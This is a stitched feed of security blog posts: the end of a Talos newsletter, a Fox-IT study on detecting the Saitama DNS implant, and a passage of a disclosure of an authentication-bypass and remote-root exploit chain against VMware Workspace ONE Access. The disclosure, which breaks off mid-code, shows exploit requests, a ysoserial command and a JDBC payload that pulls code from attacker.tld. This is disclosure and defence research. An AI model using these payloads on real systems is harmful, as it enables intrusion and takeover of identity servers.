code execution and memory leak. (Talos blog, Krebs on Security, SecurityWeek Some of the U.K.’s 111 services were disrupted earlier this week after a suspected cyber attack against its managed service provider. The country’s National Health System warned residents that some emergency calls could be delayed and others could not schedule health appointments. Advance, the target of the attack, said it was investigating the potential theft of patient data. As of Thursday morning, at least nine NHS mental health trusts could face up to three weeks without access to vulnerable patients’ records, though the incident has been “contained.” (SC Magazine, Bloomberg, The Guardian An 18-year-old and her mother are facing charges in Nebraska over an alleged medicated abortion based on information obtained from Facebook messages. Court records indicate state law enforcement submitted a search warrant to Meta, the parent company of Facebook, demanding all private data, including messages, that the company had for the two people charged. The contents of those messages were then used as the basis of a second search warrant, in which additional computers and devices were confiscated. Although the investigation began before the U.S. Supreme Court’s reversal of Roe v. Wade, the case highlights a renewed focus on digital privacy and data storage. (Vice, CNN ## Can’t get enough Talos? ## Upcoming events where you can find Talos (Aug. 10 - 12, 2022) Las Vegas, Nevada (Aug. 11 - 14, 2022) Las Vegas, Nevada (Aug. 25, 2022) Virtual ## Most prevalent malware files from Talos telemetry over the past week SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934 MD5: 93fefc3e88ffb78abb36365fa5cf857c Typical Filename: Wextract Claimed Product: Internet Explorer Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg MD5: 2c8ea737a232fd03ab80db672d50a17a Typical Filename: LwssPlayer.scr Claimed Product: 梦想之巅幻灯播放器 Detection Name: Auto.125E12.241442.in02 MD5: a087b2e6ec57b08c0d0750c60f96a74c Typical Filename: AAct.exe Claimed Product: N/A Detection Name: PUA.Win.Tool.Kmsauto::1201 MD5: 8c69830a50fb85d8a794fa46643493b2 Typical Filename: AAct.exe Claimed Product: N/A Detection Name: PUA.Win.Dropper.Generic::1201 MD5: 311d64e4892f75019ee257b8377c723e Typical Filename: ultrasurf-21-32.exe Claimed Product: N/A Detection Name: W32.DFC.MalParent # Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study 11 August 2022 at 16:05 Max Groot & Ruud van Luijk TL;DR A recently uncovered malware sample dubbed ‘Saitama’ was uncovered by security firm Malwarebytes in a weaponized document, possibly targeted towards the Jordan government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Group’s Research and Intelligence Fusion Team (RIFT) to be able to detect DNS-tunnelling implants such as Saitama. The developed implementation as well as recordings of the implant are shared on the Fox-IT GitHub. Introduction For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTP’s) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure. In May 2022, security firm Malwarebytes published a two1-part2 blog about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed ‘Saitama’, sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries. Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOC’s) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set-up in a variety of ways, and how this variety affects the detection engineering process. To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama on the Fox-IT GitHub. This can be used to control the implant in a lab environment. Moreover, ‘on the wire’ recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implant’s traffic, using a Suricata signature and behavioural detection. Reconstructing the Saitama traffic The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere3. However, to generate a full recording of the implant’s behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available. If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the “PCAP or it didn’t happen” philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP. The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a Proof-of-Concept. We do not intend on fully weaponizing the implant “for the greater good”, and have thus provided resources to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama. Let’s do the twist The usage of DNS as the channel for C2 communication has a few upsides and quite some major downsides from an attacker’s perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee the DNS query reaches the C2 server. For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync for them to both shuffle their character sets in the same way. On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable. Using a shared secret key (“haruto” for the variant discussed here) and a shared initial character set (“razupgnv2w01eos4t38h7yqidxmkljc6b9f5”), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every ‘twist’. To encode this counter, the implant relies on a function named ‘_IntToString’. This function receives an integer and a ‘base string’, which for the first DNS query is the same initial, shared character set as identified in the previous paragraph. Until the input number is equal or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable ‘str’ which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down. To determine the initial seed, the server has to ‘invert’ this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion because this conversion rounds down without any decimals. The server tries to invert this conversion by using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client and thus must verify whether the inversion function calculated the correct seed. If this is not the case, the server literately tries higher numbers until the correct seed is found. Once this hurdle is taken, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same ‘language’. The server then simply substitutes the characters from the shuffled alphabet back into the ‘base’ alphabet to derive what data was sent by the client. Twist, Sleep, Send, Repeat Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to more quickly execute commands and receive outputs, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour will only trigger an alert when it happens multiple times in a certain period. The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to ‘skip’ the sleeping step altogether. These sleep times and distribution of communication hinder detection efforts, as they allow the implant to further ‘blend in’ with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the ‘needle’ that is this implant’s traffic very deep in the haystack of the overall network traffic. For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy while keeping it usable. Considering Saitama’s sleep times and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the ‘whoami /priv’ command, which once zlib deflated is 663 bytes, takes more than an hour to transmit from victim machine to a C2 server. Transmission between server implementation and the implant The implant does contain a set of hardcoded commands that can be triggered using only one command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are even used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other sent command. Detection Detecting DNS tunnelling has been the subject of research for a long time, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose. While ‘idle’ implants can be hard to detect due to little communication occurring over the wire, any DNS implant will have to make more noise once it starts receiving commands and sending command outputs. These communication ‘bursts’ is where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries. Signature-based Where possible we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant as outlined previously makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule: alert dns$HOME_NET any -> any 53 (msg:"FOX-SRT - Trojan - Possible Saitama Exfil Pattern Observed"; flow:stateless; content:"|00 01 00 00 00 00 00 00|"; byte_test:1,>=,0x1c,0,relative; fast_pattern; byte_test:1,<=,0x1f,0,relative; dns_query; content:"."; content:"."; distance:1; content:!"."; distance:1; pcre:"/^(?=[0-9]+[a-z]\|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$/"; threshold:type both, track by_src, count 50, seconds 3600; classtype:trojan-activity; priority:2; reference:url, https://github.com/fox-it/saitama-server; metadata:ids suricata; sid:21004170; rev:1;) This signature may seem a bit complex, but if we dissect this into separate parts it is intuitive given the previous parts. The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the ‘send and receive’ command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Then, 2 bytes are dedicated to the byte index of the output data. Followed by 20 bytes of base-32 encoded output. Lastly the current value for the ‘counter’ variable will be sent. As this number can range between 0 and 46656, this takes between 1 and 5 bytes. Behaviour-based The randomization that makes it difficult to create signatures is also to the defender’s advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain that has an encrypted or encoded part. While initially one might opt for measuring entropy to approximate randomness, said technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about4, is better suited. Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel an attacker needs to be able to send multiple commands and receive corresponding output, resulting in (slow) bursts of multiple queries. This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as ‘randomized’. The specifics of these bursts differ slightly between tools, but in general, there is no or little idle time between two queries. Saitama is an exception in this case. It uses a uniformly distributed sleep between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive start to determine the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value and in 50% of the cases there are less than 60 queries in an hour. To be sure we detect this, regardless of random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution we can calculate the number of queries that result in an acceptable probability. Looking at the distribution, that would be 53. We use 50 in our signature and other rules to incorporate possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold. Different thresholds for different tools may be used to balance False Positives and False Negatives. In summary, combining detection for random-appearing DNS queries with a minimum threshold of random-like DNS queries per hour, can be a useful approach for the detection of DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list for domains that have been verified to be benign. While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs. Conclusion When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implant’s behaviour. This can subsequently be used for detection engineering purposes. Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign. Resources With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions. The server-side implementation of Saitama can be found on the Fox-IT GitHub. This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP. References # Microsoft Bug Bounty Programs Year in Review:$13.7M in Rewards

11 August 2022 at 16:00
The Microsoft Bug Bounty Programs and partnerships with the global security research community are important parts of Microsoft’s holistic approach to defending customers against security threats. Our bounty programs incentivize security research in high-impact areas to stay ahead of the ever-changing security landscapes, emerging technology, and new threats. Security Researchers help us secure millions of …

# IAM Whoever I Say IAM :: Infiltrating VMWare Workspace ONE Access Using a 0-Click Exploit

11 August 2022 at 14:00

On March 2nd, I reported several security vulnerabilities to VMWare impacting their Identity Access Management (IAM) solution. In this blog post I will discuss some of the vulnerabilities I found, the motivation behind finding such vulnerabilities and how companies can protect themselves. The result of the research project concludes with a pre-authenticated remote root exploit chain nicknamed Hekate. The advisories and patches for these vulnerabilities can be found in the references section.

## Introduction

Single Sign On (SSO) has become the dominant authentication scheme to login to several related, yet independent, software systems. At the core of this are the identity providers (IdP). Their role is to perform credential verification and to supply a signed token containing assertions that a service providers (SP) can consume for access control. This is implemented using a protocol called Security Assertion Markup Language (SAML).

On the other hand, when an application requests resources on behalf of a user and they’re granted, then an authorization request is made to an authorization server (AS). The AS exchanges a code for a token which is presented to a resource server (RS) and the requested resources are consumed by the requesting application. This is known as Open Authorization (OAuth), the auth here is standing for authorization and not authentication.

Whilst OAuth2 handles authorization (identity), and SAML handles authentication (access) a solution is needed to manage both since an organizations network perimeter can get very wide and complex. Therefore, a market for Identity and Access Management (IAM) solutions have become very popular in the enterprise environment to handle both use cases at scale.

## Motivation

This project was motivated by a high impact vulnerabilities affecting similar software products, let’s take a look in no particular order:

1. Cisco Identity Services Engine

This product was pwned by Pedro Ribeiro and Dominik Czarnota using a pre-authenticated stored XSS vulnerability leading to full remote root access chaining an additional two vulnerabilities.

2. ForgeRock OpenAM

This product was pwned by Michael Stepankin using a pre-authenticated deserialization of untrusted data vulnerability in a 3rd party library called jato. Michael had to get creative here by using a custom Java gadget chain to exploit the vulnerability.

3. Oracle Access Manager (OAM)

Peter Json and Jang blogged about a pre-authenticated deserialization of untrusted data vulnerability impacting older versions of OAM.

4. VMWare Workspace ONE Access

Two high impact vulnerabilities were discovered here. The first being CVE-2020-4006 which was exploited in the wild (ITW) by state sponsored attackers which excited my interest initially. The details of this bug was first revealed by William Vu and essentially boiled down to a post-authenticated command injection vulnerability. The fact that this bug was post-authenticated and yet was still exploited in the wild (ITW) likely means that this software product is of high interest to attackers.

The second vulnerability was discovered by Shubham Shah of Assetnote which was a SSRF that could have been used by malicious attackers to leak the users JSON Web Token (JWT) via the Authorization header.

With most of this knowledge before I even started, I knew that vulnerabilities discovered in a system like this would have a high impact. So, at the time I asked myself: does a pre-authenticated remote code execution vulnerability/chain exist in this code base?

## Version

The vulnerable version at the time of testing was 21.08.0.1 which was the latest and deployed using the identity-manager-21.08.0.1-19010796_OVF10.ova (SHA1: 69e9fb988522c92e98d2910cc106ba4348d61851) file. It was released on the 9th of December 2021 according to the release notes. This was a Photon OS Linux deployment designed for the cloud.

## Challenges

I had several challenges and I think it’s important to document them so that others are not discouraged when performing similar audits.

1. Heavy use of Spring libraries

This software product heavily relied on several spring components and as such didn’t leave room for many errors in relation to authentication. Interceptors played a huge role in the authentication process and were found to not contain any logic vulnerabilities in this case.

Additionally, With Spring’s StrictHttpFirewall enabled, several attacks to bypass the authentication using well known filter bypass attacks failed.

2. Minimal attack surface

There was very little pre-authenticated attack surface that exposed functionality of the application outside of authentication protocols like SAML and OAuth 2.0 (including OpenID Connect) which minimizes the chance of discovering a pre-authenticated remote code execution vulnerability.

3. Code quality

The code quality of this product was very good. Having audited many Java applications in the past, I took notice that this product was written with security in mind and the overall layout of libraries, syntax used, spelling of code was a good reflection of that. In the end, I only found two remote code execution vulnerabilities and they were in a very similar component.

Let’s move on to discussing the vulnerabilities in depth.

## OAuth2TokenResourceController Access Control Service (ACS) Authentication Bypass Vulnerability

The com.vmware.horizon.rest.controller.oauth2.OAuth2TokenResourceController class has two exposed endpoints. The first will generate an activation code for an existing oauth2 client:

/*     */   @RequestMapping(value = {"/generateActivationToken/{id}"}, method = {RequestMethod.POST})
/*     */   @ResponseBody
/*     */   @ApiOperation(value = "Generate and update activation token for an existing oauth2 client", response = OAuth2ActivationTokenMedia.class)
/*     */   @ApiResponses({@ApiResponse(code = 500, message = "Generation failed, unknown error."), @ApiResponse(code = 400, message = "Generation failed, client is invalid or not specified.")})
/*     */   public OAuth2ActivationTokenMedia generateActivationToken(@ApiParam(value = "OAuth 2.0 Client identifier", example = "\"my-auth-grant-client1\"", required = true) @PathVariable("id") String clientId, HttpServletRequest request) throws MyOneLoginException {
/* 128 */     OrganizationRuntime orgRuntime = getOrgRuntime(request);
/* 129 */     OAuth2Client client = this.oAuth2ClientService.getOAuth2Client(orgRuntime.getOrganizationId().intValue(), clientId);
/* 130 */     if (client == null || client.getIdUser() == null) {
/* 131 */       throw new BadRequestException("invalid.client", new Object[0]);
/*     */     }


The second will activate the device OAuth2 client by exchanging the activation code for a client ID and client secret:

/*     */   @RequestMapping(value = {"/activate"}, method = {RequestMethod.POST})
/*     */   @ResponseBody
/*     */   @ApiOperation(value = "Activate the device client by exchanging an activation code for a client ID and client secret.", notes = "This endpoint is used in the dynamic mobile registration flow. The activation code is obtained by calling the /SAAS/auth/device/register endpoint. The client_secret and client_id returned in this call will be used in the call to the /SAAS/auth/oauthtoken endpoint.", response = OAuth2ClientActivationDetails.class)
/*     */   @ApiResponses({@ApiResponse(code = 500, message = "Activation failed, unknown error."), @ApiResponse(code = 404, message = "Activation failed, organization not found."), @ApiResponse(code = 400, message = "Activation failed, activation code is invalid or not specified.")})
/*     */   public OAuth2ClientActivationDetails activateOauth2Client(@ApiParam(value = "the activation code", required = true) @RequestBody String activationCode, HttpServletRequest request) throws MyOneLoginException {
/* 102 */     OrganizationRuntime organizationRuntime = getOrgRuntime(request);
/*     */     try {
/* 104 */       return this.activationTokenService.activateAndGetOAuth2Client(organizationRuntime.getOrganization(), activationCode);
/* 105 */     } catch (EncryptionException e) {
/* 106 */       throw new BadRequestException("invalid.activation.code", e, new Object[0]);
/* 107 */     } catch (MyOneLoginException e) {
/*     */
/* 109 */       if (e.getCode() == 80480 || e.getCode() == 80476 || e.getCode() == 80440 || e.getCode() == 80558) {
/* 110 */         throw new BadRequestException("invalid.activation.code", e, new Object[0]);
/*     */       }
/* 112 */       throw e;
/*     */     }
/*     */   }


This is enough for an attacker to then exchange the client_id and client_secret for an OAuth2 token to achieve a complete authentication bypass. Now, this wouldn’t have been so easily exploitable if no default OAuth2 clients were present, but as it turns out. There are two internal clients installed by default:

We can verify this when we check the database on the system:

These clients are created in several locations, one of them is in the com.vmware.horizon.rest.controller.system.BootstrapController class. I won’t bore you will the full stack trace, but it essentially leads to a call to createTenant in the com.vmware.horizon.components.authentication.OAuth2RemoteAccessServiceImpl class:

/*     */   public boolean createTenant(int orgId, String tenantId) {
/*     */     try {
/* 335 */       createDefaultServiceOAuth2Client(orgId); // 1
/* 336 */     } catch (Exception e) {
/* 337 */       log.warn("Failed to create the default service oauth2 client for org " + tenantId, e);
/* 338 */       return false;
/*     */     }
/* 340 */     return true;
/*     */   }


At [1] the code calls createDefaultServiceOAuth2Client:

/*     */   @Nonnull
/*     */   public OAuth2Client createDefaultServiceOAuth2Client(int orgId) throws MyOneLoginException {
/* 116 */     OAuth2Client oAuth2Client = this.oauth2ClientService.getOAuth2Client(orgId, "Service__OAuth2Client");
/* 117 */     if (oAuth2Client == null) {
/* 118 */       Organizations firstOrg = this.organizationService.getFirstOrganization();
/* 119 */       if (firstOrg.getId().intValue() == orgId) {
/* 120 */         log.info("Creating service_oauth2 client for root tenant.");
/* 121 */         return createSystemScopedServiceOAuth2Client(firstOrg, "Service__OAuth2Client", null, "admin system"); // 2
/*     */       }
/*     */     //...
/* 131 */     return oAuth2Client;
/*     */   }


The code at [2] calls createSystemScopedServiceOAuth2Client which, as the name suggests creates a system scoped oauth2 client using the clientId “Service__OAuth2Client”. I actually found another authentication bypass documented as SRC-2022-0007 using variant analysis, however it impacts only the cloud environment due to the on-premise version not loading the authz Spring profile by default.

## DBConnectionCheckController dbCheck JDBC Injection Remote Code Execution Vulnerability

The com.vmware.horizon.rest.controller.system.DBConnectionCheckController class exposes a method called dbCheck

/*     */   @RequestMapping(method = {RequestMethod.POST}, produces = {"application/json"})
/*     */   @ProtectedApi(resource = "vrn:tnts:*", actions = {"tnts:read"})
/*     */   @ResponseBody
/*     */   public RESTResponse dbCheck(@RequestParam(value = "jdbcUrl", required = true) String jdbcUrl, @RequestParam(value = "dbUsername", required = true) String dbUsername, @RequestParam(value = "dbPassword", required = true) String dbPassword) throws MyOneLoginException {
/*     */     String driverVersion;
/*     */     try {
/*  76 */       if (this.organizationService.countOrganizations() > 0L) { // 1
/*  77 */         assureAuthenticatedApiAdmin(); // 2
/*     */       }
/*  79 */     } catch (Exception e) {
/*  80 */       log.info("Check for existing organization threw an exception.", driverVersion);
/*     */     }
/*     */
/*     */     try {
/*  84 */       String encryptedPwd = configEncrypter.encrypt(dbPassword);
/*  85 */       driverVersion = this.dbConnectionCheckService.checkConnection(jdbcUrl, dbUsername, encryptedPwd); // 3
/*  86 */     } catch (PersistenceRuntimeException e) {
/*  87 */       throw new MyOneLoginException(HttpStatus.NOT_ACCEPTABLE.value(), e.getMessage(), e);
/*     */     }
/*  89 */     return new RESTResponse(Boolean.valueOf(true), Integer.valueOf(HttpStatus.OK.value()), driverVersion, null);
/*     */   }


At [1] the code checks to see if there are any existing organizations (there will be if it’s set-up correctly) and at [2] the code validates that an admin is requesting the endpoint. At [3] the code calls DbConnectionCheckServiceImpl.checkConnection using the attacker controlled jdbcUrl.

/*  73 */   public String checkConnection(String jdbcUrl, String username, String password) throws PersistenceRuntimeException { return checkConnection(jdbcUrl, username, password, true); }
/*     */   public String checkConnection(@Nonnull String jdbcUrl, @Nonnull String username, @Nonnull String password, boolean checkCreateTableAccess) throws PersistenceRuntimeException {
/*  87 */     connection = null;
/*  88 */     String driverVersion = null;
/*     */     try {
/*  92 */       meta = connection.getMetaData();
/*  93 */       driverVersion = meta.getDriverVersion();
/*  94 */     } catch (SQLException e) {
/*  95 */       log.error("connectionFailed");
/*  96 */       throw new PersistenceRuntimeException(e.getMessage(), e);
/*     */     } finally {
/*     */       try {
/*  99 */         if (connection != null) {
/* 100 */           connection.close();
/*     */         }
/* 102 */       } catch (Exception e) {
/* 103 */         log.warn("Problem closing connection", e);
/*     */       }
/*     */     }
/* 106 */     return driverVersion;
/*     */   }


The code calls DbConnectionCheckServiceImpl.testConnection at [4] with an attacker controlled jdbcUrl string.

/*     */   private Connection testConnection(String jdbcUrl, String username, String password, boolean checkCreateTableAccess) throws PersistenceRuntimeException {
/*     */     try {
/*     */
/*     */
/* 127 */       log.info("sql verification triggered");
/* 128 */       this.factoryHelper.sqlVerification(connection, username, Boolean.valueOf(checkCreateTableAccess));
/*     */
/* 130 */       if (checkCreateTableAccess) {
/* 131 */         return testCreateTableAccess(jdbcUrl, connection);
/*     */       }
/*     */
/* 134 */       return testUpdateTableAccess(connection);
/*     */     }


The code calls FactoryHelper.getConnection at [5].

/*     */     public Connection getConnection(String jdbcUrl, String username, String password) throws SQLException {
/*     */       try {
/* 428 */       } catch (Exception ex) {
/* 429 */         if (ex.getCause() != null && ex.getCause().toString().contains("javax.net.ssl.SSLHandshakeException")) {
/* 430 */           log.info(String.format("ssl handshake failed for the user:%s ", new Object[] { username }));
/* 431 */           throw new SQLException("database.connection.ssl.notSuccess");
/*     */         }
/* 433 */         log.info(String.format("Connection failed for the user:%s ", new Object[] { username }));
/* 434 */         throw new SQLException("database.connection.notSuccess");
/*     */       }
/*     */     }


Finally, at [6] the attacker can reach a DriverManager.getConnection sink which will lead to an arbitrary JDBC URI connection. Given the flexibility of JDBC, the attacker can use any of the deployed drivers within the application. This vulnerability can lead to remote code execution as the horizon user which will be discussed in the exploitation section.

## publishCaCert and gatherConfig Privilege Escalation

After gaining remote code execution as the horizon user, we can exploit the following vulnerability to gain root access. This section contains two bugs, but I decided to report it as a single vulnerability due to the way I (ab)used them in the final exploit chain.

1. The publishCaCert.hzn script allows attackers to disclose sensitive files.
2. The gatherConfig.hzn script allows attackers to take ownership of sensitive files

These scripts can be executed by the horizon user with root privileges without a password using sudo. They were not writable by the horizon user so I audited the scripts for logical issues to escalate cleanly.

1. publishCaCert.hzn:

For this bug we can see that it will take a file on the command line and copy it to /etc/ssl/certs/ at [1] and then make it readable/writable by the owner at [2]!

#!/bin/sh

#Script to isolate sudo access to just publishing a single file to the trusted certs directory

CERTFILE=$1 DESTFILE=$(basename $2) cp -f$CERTFILE /etc/ssl/certs/$DESTFILE // 1 chmod 644 /etc/ssl/certs/$DESTFILE // 2
c_rehash > /dev/null

2. gatherConfig.hzn:

For taking ownership, we can use a symlink called debugConfig.txt and point it to a root owned file at [1].

#!/bin/bash
#
. /usr/local/horizon/scripts/hzn-bin.inc
. /usr/local/horizon/scripts/manageTcCfg.inc
DEBUG_FILE=$1 #... function gatherConfig() { printLines echo "1) cat /usr/local/horizon/conf/flags/sysconfig.hostname" >${DEBUG_FILE}
#...
chown $TOMCAT_USER:$TOMCAT_GROUP $DEBUG_FILE // 1 } if [ -z "$DEBUG_FILE" ]
then
usage
else
DEBUG_FILE=${DEBUG_FILE}/"debugConfig.txt" gatherConfig fi  ## Exploitation ### OAuth2TokenResourceController ACS Authentication Bypass 1. First, we can grab the activationToken. Request: POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client HTTP/1.1 Host: photon-machine Content-Type: application/x-www-form-urlencoded Content-Length: 0  Response: { "activationToken": "eyJvdGEiOiJiNmRlZmFkOS1iY2M3LTM3ZWUtYTdkZi05YTM2ZDcxZDU4MGE6c0dJcnlObEhxREVnUW...", "_links": {} }  2. Now, with the activation token let’s get the client_id and client_secret. Request: POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1 Host: photon-machine Content-Type: application/x-www-form-urlencoded Content-Length: 168 eyJvdGEiOiJiNmRlZmFkOS1iY2M3LTM3ZWUtYTdkZi05YTM2ZDcxZDU4MGE6c0dJcnlObEhxREVnUW...  Response: { "client_id": "Service__OAuth2Client", "client_secret": "uYkAzg1woC1qbCa3Qqd0i6UXpwa1q00o" }  From this point, exploitation is just the standard OAuth2 flow to grab a signed JWT. ### DBConnectionCheckController dbCheck JDBC Injection Remote Code Execution Technique 1 - Remote code execution via the MySQL JDBC Driver autoDeserialize It was also possible to perform remote code execution via the MySQL JDBC driver by using the autoDeserialize property. The server would connect back to the attacker’s malicious MySQL server where it could deliver an arbitrary serialized Java object that could be deserialized on the server. As it turns out, the off the shell ysoserial CommonsBeanutils1 gadget worked a treat: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 <cmd>. This technique was first presented by Yang Zhang, Keyi Li, Yongtao Wang and Kunzhe Chai at Blackhat Europe in 2019. This was the technique I used in the exploit I sent to VMWare because I wanted to hint at their usage of unsafe libraries that contain off the shell gadget chains in them! Technique 2 - Remote code execution via the PostgreSQL JDBC Driver socketFactory It was possible to perform remote code execution via the socketFactory property of the PostgreSQL JDBC driver. By setting the socketFactory and socketFactoryArg properties, an attacker can trigger the execution of a constructor defined in an arbitrary Java class with a controlled string argument. Since the application was using Spring with a Postgres database, it was the perfect candidate to (ab)use FileSystemXmlApplicationContext! Proof of Concept: jdbc:postgresql://si/saas?&socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://attacker.tld:9090/bean.xml. But of course, we can improve on this. Inspired by RicterZ, let’s say you want to exploit the bug without internet access. You can re-use the com.vmware.licensecheck.LicenseChecker class VMWare provides us and mix deserialization with the PostgreSQL JDBC driver attack. Let’s walk from one of the LicenseChecker constructors, right to the vulnerable sink.  public LicenseChecker(final String s) { this(s, true); // 1 } public LicenseChecker(final String state, final boolean validateExpiration) { this._handle = new LicenseHandle(); if (state != null) { this._handle.setState(state); // 2 } this._validateExpiration = validateExpiration; }  At [1] the code calls another constructor in the same class with the parsed in string. At [2] the code calls setState on the LicenseHandle class:  public void setState(String var1) { if (var1 != null && var1.length() >= 1) { try { byte[] var2 = MyBase64.decode(var1); // 3 if (var2 != null && this.deserialize(var2)) { // 4 this._state = var1; this._isDirty = false; } } catch (Exception var3) { log.debug(new Object[]{"failed to decode state: " + var3.getMessage()}); } } }  At [3] the code base64 decodes the string and at [4] the code then calls deserialize:  private boolean deserialize(byte[] var1) { if (var1 == null) { return true; } else { try { ByteArrayInputStream var2 = new ByteArrayInputStream(var1); DataInputStream var3 = new DataInputStream(var2); int var4 = var3.readInt(); switch(var4) { case -889267490: return this.deserialize_v2(var3); // 5 default: log.debug(new Object[]{"bad magic: " + var4}); } } catch (Exception var5) { log.debug(new Object[]{"failed to de-serialize handle: " + var5.getMessage()}); } return false; } }  You can probably see where this is going already. At [5] the code calls deserialize_v2 if a supplied int is -889267490:  private boolean deserialize_v2(DataInputStream var1) throws IOException { byte[] var2 = Encrypt.readByteArray(var1); if (var2 == null) { log.debug(new Object[]{"failed to read cipherText"}); return false; } else { try { byte[] var3 = Encrypt.decrypt(var2, new String(keyBytes_v2)); // 6 if (var3 == null) { log.debug(new Object[]{"failed to decrypt state data"}); return false; } else { ByteArrayInputStream var4 = new ByteArrayInputStream(var3); ObjectInputStream var5 = new ObjectInputStream(var4); 